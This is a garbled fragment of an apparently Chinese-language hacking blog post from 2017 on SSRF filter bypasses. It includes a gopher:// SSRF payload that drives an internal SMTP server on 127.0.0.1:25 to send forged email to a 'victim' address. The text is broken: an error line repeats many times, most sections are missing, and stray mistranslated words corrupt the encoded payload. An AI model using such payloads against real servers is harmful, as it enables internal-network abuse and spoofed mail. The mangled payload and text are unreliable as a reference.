前言昨天忘了在公众号还是微博上看到的了,看到一个SSRF绕过的技巧,使用的是 ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ 绕过的,自己也没遇到过。然后想想自己对SSRF绕过还是停留在之前的了解,也没学习过新的绕过方法,所…
Failure when receiving data from the peer
Failure when receiving data from the peer
Failure when receiving data from the peer
Failure when receiving data from the peer
Failure when receiving data from the peer
Failure when receiving data from the peer
Failure when receiving data from the peer
Ssrf.php?url=gopher: //127.0.0.1: 25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker @ site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim @ site.com% 3E%250D%250aDATA%250D%250aFrom%3A%20%5BHacker%5D%20%3Chacker @ site.com%3E%250D%250aTo%3A%20%3Cvictime @ site.com%3E%250D%250aDate%3A% 20Tue%2C%2015%20Sep%202017%2017%3A20 3A26%%20-0400%250D%250aSubject%3A%20AH%20AH%20AH%250D%250A%250D%250aYou%20didn%27吨%20say%第二十条%20magic% 20word%20%21%250D%250A%250D%250A%250D%250A。%250D%250aQUIT%250D%250A
13,使用组合
各种旁路可以自由组合
参考链接:
https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
https://twitter.com/albinowax/status/890725759861403648
http://blog.safebuff.com/2016/07/03/SSRF-Tips/
Failure when receiving data from the peer
-
发表于 2017-11-22 08:00
- 阅读 ( 647 )
- 分类:黑客技术
